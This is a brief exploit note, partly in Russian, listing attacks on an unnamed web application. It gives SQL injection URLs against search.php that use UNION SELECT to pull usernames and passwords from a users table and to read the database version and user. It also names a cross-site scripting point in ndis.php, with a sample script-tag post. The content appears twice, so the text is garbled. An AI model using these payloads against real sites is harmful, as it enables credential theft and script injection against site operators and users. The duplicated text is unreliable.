1. SQL Injection
/search.php?a=1&q=as&rowstart=1,10%20UNION%20SELECT%200,0,0,username,password,0,0,0%20from%20users/*
/search.php?a=1&q=as&rowstart=1,10%20UNION%20SELECT%200,0,0,VERSION(),USER(),0,0,0/*
2. Cross Site Scripting
/ndis.php
Можно например, создать такой пост:
<script>document.write("");</script>
/search.php?a=1&q=as&rowstart=1,10%20UNION%20SELECT%200,0,0,username,password,0,0,0%20from%20users/*
/search.php?a=1&q=as&rowstart=1,10%20UNION%20SELECT%200,0,0,VERSION(),USER(),0,0,0/*
2. Cross Site Scripting
/ndis.php
Можно например, создать такой пост:
<script>document.write("");</script>